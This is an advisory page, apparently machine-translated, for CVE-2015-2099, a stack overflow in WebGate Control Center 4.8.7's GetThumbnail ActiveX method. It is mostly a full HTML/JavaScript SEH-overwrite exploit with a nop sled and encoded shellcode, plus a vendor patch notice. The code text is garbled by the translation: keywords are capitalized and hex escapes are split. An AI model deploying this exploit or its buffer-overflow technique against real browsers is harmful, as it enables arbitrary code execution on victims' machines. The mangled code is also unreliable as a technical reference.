WebGate Control Center 4.8.7 GetThumbnail Stack Overflow Vulnerability
Release date:
Updated on:
Affected Systems:
Webgate WebGate Control Center 4.8.7
Webgate WebGate Control Center
Description:
CVE (CAN) ID: CVE-2015-2099
WebGate Control Center is the central monitoring program of the network video monitoring terminal.
WESPPlayback. WESPPlaybackCtrl.1 security vulnerability exists. The GetThumbnail method copies arbitrary data to a fixed-size stack buffer, which allows attackers to execute arbitrary code in the context of the affected browser.
<* Source: rgod (rgod@autistici.org)
Link: http://www.zerodayinitiative.com/advisories/ZDI-15-063/
*>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
<Html>
<! --
Author: Praveen Darshanam
Http://blog.disects.com/
Http://darshanams.blogspot.com
# Exploit Title: WebGate Control Center GetThumbnail Stack Overflow SEH Overwrite (0Day)
# Date: Maid, 2015
# Vendorhomepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi/eng/index.php? Svc_name = product & amCode = C029 & asCode = C039 & ec_idx1 = P040 & ptype = view & page = & p_idx = 35
# Version: Control Center 4.8.7
# Tested on: Windows XP SP3 using IE/6/7/8
# CVE: 2015-2099
TargetFile = "C: \ WINDOWS \ system32 \ WESPSDK \ WESPPlayback. dll"
Prototype = "Sub GetThumbnail (ByVal SiteSerialNumber As String, ByVal Channel As Integer, ByVal secTime As Long, ByVal miliTime As Integer )"
Progid = "WESPPLAYBACKLib. WESPPlaybackCtrl"
-->
<Object classid = 'clsid: 4E14C449-A61A-4BF7-8082-65A91298A6D8 'id = 'getthumb'>
</Object>
<Script>
Var buff1 = "";
Var arg2 = 1;
Var arg3 = 1;
Var arg4 = 1;
Var nops = "";
Var buff2 = "";
For (I = 0; I <24; I ++)
{
Buff1 + = "B ";
}
// Jump over seh to shellcode
Nseh = "\ xeb \ x08PD ";
// Pop ret
Var seh = "\ xa0 \ xf2 \ x07 \ x10 ";
For (I = 0; I <80; I ++)
{
Nops + = "\ x90 ";
}
// Calc.exe payload
SC = "\ x54 \ x5d \ xda \ xc9 \ xd9 \ x75 \ xf4 \ x59 \ x49 \ x49 \ x49 \ x49 \ x49 \ x49" +
"\ X43 \ x43 \ x43 \ x43 \ x43 \ x43 \ x51 \ x5a \ x56 \ x54 \ x58 \ x33 \ x30" +
"\ X56 \ x58 \ x34 \ x41 \ x50 \ x30 \ x41 \ x33 \ x48 \ x48 \ x30 \ x41 \ x30" +
"\ X30 \ x41 \ x42 \ x41 \ x41 \ x42 \ x54 \ x41 \ x41 \ x51 \ x32 \ x41 \ x42" +
"\ X32 \ x42 \ x42 \ x30 \ x42 \ x42 \ x58 \ x50 \ x38 \ x41 \ x43 \ x4a \ x4a" +
"\ X49 \ x4b \ x4c \ x5a \ x48 \ x4b \ x32 \ x45 \ x50 \ x55 \ x50 \ x43 \ x30" +
"\ X53 \ x50 \ x4b \ x39 \ x4d \ x35 \ x30 \ x31 \ x4f \ x30 \ x52 \ x44 \ x4c" +
"\ X4b \ x56 \ x30 \ x46 \ x50 \ x4c \ x4b \ x31 \ x42 \ x34 \ x4c \ x4c \ x4b" +
"\ X31 \ x42 \ x44 \ x54 \ x4c \ x4b \ x32 \ x52 \ x47 \ x58 \ x54 \ x4f \ x38" +
"\ X37 \ x50 \ x4a \ x37 \ x56 \ x46 \ x51 \ x4b \ x4f \ x4e \ x4c \ x57 \ x4c" +
"\ X35 \ x31 \ x33 \ x4c \ x33 \ x32 \ x46 \ x4c \ x37 \ x50 \ x49 \ x51 \ x48" +
"\ X4f \ x34 \ x4d \ x45 \ x51 \ x4f \ x37 \ x4d \ x32 \ x4a \ x52 \ x36 \ x32" +
"\ X46 \ x37 \ x4c \ x4b \ x36 \ x32 \ x32 \ x30 \ x4c \ x4b \ x30 \ x4a \ x37" +
"\ X4c \ x4c \ x4b \ x30 \ x4c \ x32 \ x31 \ x54 \ x38 \ x5a \ x43 \ x51 \ x58" +
"\ X33 \ x31 \ x4e \ x31 \ x30 \ x51 \ x4c \ x4b \ x36 \ x39 \ x47 \ x50 \ x53" +
"\ X31 \ x48 \ x53 \ x4c \ x4b \ x30 \ x49 \ x35 \ x48 \ x5a \ x43 \ x36 \ x5a" +
"\ X57 \ x39 \ x4c \ x4b \ x46 \ x54 \ x4c \ x4b \ x33 \ x31 \ x49 \ x46 \ x56" +
"\ X51 \ x4b \ x4f \ x4e \ x4c \ x49 \ x51 \ x38 \ x4f \ x54 \ x4d \ x35 \ x51" +
"\ X58 \ x47 \ x37 \ x48 \ x4d \ x30 \ x34 \ x35 \ x4a \ x56 \ x43 \ x33 \ x43" +
"\ X4d \ x5a \ x58 \ x37 \ x4b \ x43 \ x4d \ x46 \ x44 \ x43 \ x45 \ x4d \ x34" +
"\ X56 \ x38 \ x4c \ x4b \ x56 \ x38 \ x31 \ x34 \ x43 \ x31 \ x4e \ x33 \ x42" +
"\ X46 \ x4c \ x4b \ x44 \ x4c \ x30 \ x4b \ x4c \ x4b \ x36 \ x38 \ x45 \ x4c" +
"\ X45 \ x51 \ x4e \ x33 \ x4c \ x4b \ x54 \ x44 \ x4c \ x4b \ x33 \ x31 \ x48" +
"\ X50 \ x4c \ x49 \ x57 \ x34 \ x36 \ x44 \ x51 \ x34 \ x51 \ x4b \ x51 \ x4b" +
"\ X33 \ x51 \ x30 \ x59 \ x50 \ x5a \ x36 \ x31 \ x4b \ x4f \ x4b \ x50 \ x31" +
"\ X4f \ x51 \ x4f \ x51 \ x4a \ x4c \ x4b \ x42 \ x32 \ x5a \ x4b \ x4c \ x4d" +
"\ X31 \ x4d \ x53 \ x5a \ x35 \ x51 \ x4c \ x4d \ x4c \ x45 \ x58 \ x32 \ x43" +
"\ X30 \ x53 \ x30 \ x55 \ x50 \ x56 \ x30 \ x42 \ x48 \ x50 \ x31 \ x4c \ x4b" +
"\ X42 \ x4f \ x4d \ x57 \ x4b \ x4f \ x59 \ x45 \ x4f \ x4b \ x5a \ x50 \ x48" +
"\ X35 \ x4f \ x52 \ x30 \ x56 \ x53 \ x58 \ x4e \ x46 \ x5a \ x35 \ x4f \ x4d" +
"\ X4d \ x4d \ x4b \ x4f \ x38 \ x55 \ x47 \ x4c \ x53 \ x36 \ x33 \ x4c \ x45" +
"\ X5a \ x4b \ x30 \ x4b \ x4b \ x4b \ x50 \ x43 \ x45 \ x43 \ x35 \ x4f \ x4b" +
"\ X47 \ x37 \ x32 \ x33 \ x53 \ x42 \ x42 \ x4f \ x42 \ x4a \ x55 \ x50 \ x46" +
"\ X33 \ x4b \ x4f \ x49 \ x45 \ x43 \ x53 \ x53 \ x51 \ x52 \ x4c \ x52 \ x43" +
"\ X36 \ x4e \ x55 \ x35 \ x44 \ x38 \ x33 \ x55 \ x33 \ x30 \ x41 \ x41 ";
For (I = 0; I <(5000-(buff1.length + nseh. length + seh. length + nops. length + SC. length); I ++)
{
Buff2 + = "";
}
Fbuff = buff1 + nseh + seh + nops + SC + buff2;
Getthumb. GetThumbnail (fbuff, arg2, arg3, arg4 );
</Script>
</Html>
Suggestion:
Vendor patch:
Webgate
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.webgateinc.com/wgi/eng/index.php? Svc_name = product & amCode = C029 & asCode = C039 & ec_idx1 = P040 & ptype = view & page = & p_idx = 35
This article permanently updates the link address: